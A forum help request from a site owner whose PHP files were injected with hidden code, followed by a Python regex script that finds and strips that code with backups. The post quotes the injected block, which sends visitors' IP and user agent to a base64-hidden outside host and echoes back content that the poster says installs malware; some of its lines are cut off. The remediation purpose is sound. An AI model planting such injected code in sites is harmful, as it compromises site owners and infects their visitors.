Problem with code inserted in base64_decode php scripts from accounts.

michel.rw

Registered
Jun 13, 2011
Hi there, I have a serious problem.

I have several domains hosted on my reseller account, and a few days ago these areas were invaded and the accounts' PHP files were changed.
Checking these changes, I noticed that the following code was inserted in the files:

<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(st$
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
        $stCurlLink = base64_decode( 'aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&dom$
            $stCurlHandle = curl_init( $stCurlLink );
    }
    }
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    $sResult = @curl_exec($stCurlHandle);
    if ($sResult[0]=="O")
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle);
}
}
?>

Analyzing this code we find that it is an encrypted link that redirects to a page from a server that installs malware on a PC.
I urgently need to remove that code, and I cannot find a way to remove it.

I need help.
I learned that it would be easier to remove that code from the affected pages with regular expressions.
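
One way to do the regex cleanup asked about above, as an added example that is not part of the original post. It assumes the injected block always opens with the `$sRetry` guard and ends at its own `?>`, as in the posted sample; `strip_injection`, `clean_tree` and the `.infected` backup suffix are names chosen for this example.

```python
import re
from pathlib import Path

# Opening of the injected block as posted: "<?php if (!isset($sRetry))" up to the first "?>".
BLOCK = re.compile(
    r"<\?php\s*if\s*\(\s*!isset\(\$sRetry\)\s*\).*?\?>[ \t]*\r?\n?", re.DOTALL)
# Other identifiers from the posted sample; all must be present before deleting.
MARKERS = ("$stCurlHandle", "base64_decode", "curl_exec")

def strip_injection(source):
    """Return (cleaned_source, number_of_blocks_removed)."""
    removed = 0
    def repl(match):
        nonlocal removed
        block = match.group(0)
        # A second "<?php" means the match ran past the injection into real code.
        if block.count("<?php") == 1 and all(m in block for m in MARKERS):
            removed += 1
            return ""
        return block  # not confident: leave untouched for manual review
    return BLOCK.sub(repl, source), removed

def clean_tree(root, apply=False):
    """Report infected *.php files under root; rewrite only when apply=True."""
    hits = []
    for path in sorted(Path(root).rglob("*.php")):
        # latin-1 round-trips every byte, so the rest of the file is unchanged.
        original = path.read_bytes().decode("latin-1")
        cleaned, count = strip_injection(original)
        if count:
            hits.append((str(path), count))
            if apply:
                backup = path.with_name(path.name + ".infected")
                backup.write_bytes(original.encode("latin-1"))
                path.write_bytes(cleaned.encode("latin-1"))
    return hits

# Constructed sample: a shortened stand-in for the injected block, then real page code.
SAMPLE = (
    "<?php\nif (!isset($sRetry))\n{\nglobal $sRetry;\n$sRetry = 1;\n"
    "$stCurlHandle = curl_init(base64_decode('PLACEHOLDER'));\n"
    "$sResult = @curl_exec($stCurlHandle);\n}\n?>\n"
    "<?php echo 'legitimate page'; ?>\n"
)

if __name__ == "__main__":
    print(strip_injection(SAMPLE))
    print(clean_tree("."))  # dry run: lists infected files, changes nothing
```

Run the dry run first and review the list before calling `clean_tree(root, apply=True)`. Removing the block does not close whatever allowed the files to be modified, so the files can be altered again until that is found.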
 